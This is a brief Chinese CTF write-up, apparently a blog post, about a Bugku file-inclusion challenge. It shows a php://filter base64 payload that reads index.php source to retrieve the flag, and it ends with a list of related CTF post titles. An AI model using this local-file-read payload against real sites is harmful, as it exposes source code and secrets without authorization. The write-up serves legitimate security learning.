bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
H轨迹H3 天前
BUUCTF-Web方向16-20wp
网络安全·渗透测试·ctf·buuctf
Мартин.3 天前
[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升
网络协议·http·laravel·ctf
lally.6 天前
web信息泄露 ctfshow-web入门web1-web10
web·ctf·信息泄露
希望奇迹很安静9 天前
CTFSHOW-WEB入门-PHP特性109-115
开发语言·前端·web安全·php·ctf·新手
0DayHP11 天前
[HCTF 2018]WarmUp
ctf
Мартин.12 天前
[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升
ctf
希望奇迹很安静17 天前
CTFSHOW-WEB入门-PHP特性89-100
学习·web安全·php·ctf
希望奇迹很安静23 天前
CTFSHOW-WEB入门-命令执行29-32
前端·web安全·ctf
希望奇迹很安静1 个月前
CTFSHOW-WEB入门-文件包含78-81
学习·web安全·ctf
H轨迹H1 个月前
BUUCTF刷题-Web方向1~5wp
网络安全·渗透测试·ctf·buuctf·web漏洞